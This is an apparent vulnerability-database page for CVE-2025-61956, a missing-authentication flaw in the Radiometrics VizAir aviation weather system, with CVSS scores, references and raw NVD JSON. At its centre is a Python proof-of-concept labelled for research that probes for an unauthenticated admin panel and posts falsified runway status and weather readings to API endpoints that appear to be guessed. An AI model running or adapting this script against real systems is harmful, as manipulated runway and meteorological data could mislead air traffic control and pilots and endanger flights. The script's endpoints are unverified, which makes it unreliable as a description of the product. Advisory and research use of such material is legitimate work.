CVE-2025-61956

Description

Radiometrics VizAir is vulnerable to a lack of authentication mechanisms for critical functions, such as admin access and API requests. Attackers can modify configurations without authentication, potentially manipulating active runway settings and misleading air traffic control (ATC) and pilots. Additionally, manipulated meteorological data could mislead forecasters and ATC, causing inaccurate flight planning.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:radiometrics:vizair:*:*:*:*:*:*:*:* - VULNERABLE

Radiometrics VizAir < 最新修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-61956 PoC - Radiometrics VizAir Authentication Bypass
# Target: Radiometrics VizAir system
# Vulnerability: Missing authentication for critical functions

target_ip = "192.168.1.100"  # Replace with actual target IP
base_url = f"http://{target_ip}"

# PoC 1: Access admin panel without authentication
def check_admin_access():
    """Check if admin panel is accessible without authentication"""
    admin_url = f"{base_url}/admin"
    response = requests.get(admin_url, timeout=10)
    if response.status_code == 200:
        print(f"[+] Admin panel accessible: {admin_url}")
        return True
    return False

# PoC 2: Modify runway configuration without authentication
def modify_runway_config(runway_id, settings):
    """Modify runway configuration without authentication"""
    api_url = f"{base_url}/api/v1/runway/{runway_id}/config"
    headers = {"Content-Type": "application/json"}
    response = requests.post(api_url, json=settings, headers=headers, timeout=10)
    if response.status_code in [200, 201]:
        print(f"[+] Runway configuration modified successfully")
        return True
    return False

# PoC 3: Modify meteorological data without authentication
def modify_weather_data(sensor_id, data):
    """Modify meteorological data without authentication"""
    api_url = f"{base_url}/api/v1/sensor/{sensor_id}/data"
    headers = {"Content-Type": "application/json"}
    response = requests.post(api_url, json=data, headers=headers, timeout=10)
    if response.status_code in [200, 201]:
        print(f"[+] Weather data modified successfully")
        return True
    return False

if __name__ == "__main__":
    print("CVE-2025-61956 PoC - Radiometrics VizAir Authentication Bypass")
    print("=" * 60)
    
    # Check admin access
    if check_admin_access():
        print("[!] VULNERABLE: Admin panel accessible without authentication")
    
    # Example: Modify runway configuration
    runway_settings = {
        "status": "inactive",
        "length": 3000,
        "direction": "09L"
    }
    modify_runway_config("runway_01", runway_settings)
    
    # Example: Modify weather data
    weather_data = {
        "wind_speed": 50,
        "visibility": 100,
        "temperature": -10
    }
    modify_weather_data("met_sensor_01", weather_data)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61956
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61956
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61956/
[4] VulDB https://vuldb.com/cve/CVE-2025-61956
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-04.json
[6] https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61956", "sourceIdentifier": "[email protected]", "published": "2025-11-04T17:16:23.490", "lastModified": "2025-11-12T17:22:11.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Radiometrics VizAir is vulnerable to a lack of authentication mechanisms for critical functions, such as admin access and API requests. Attackers can modify configurations without authentication, potentially manipulating active runway settings and misleading air traffic control (ATC) and pilots. Additionally, manipulated meteorological data could mislead forecasters and ATC, causing inaccurate flight planning."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radiometrics:vizair:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-08", "matchCriteriaId": "C403D079-7E0F-420C-8312-90466CB0EF5B"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-04.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory", "US Government Resource"]}]}}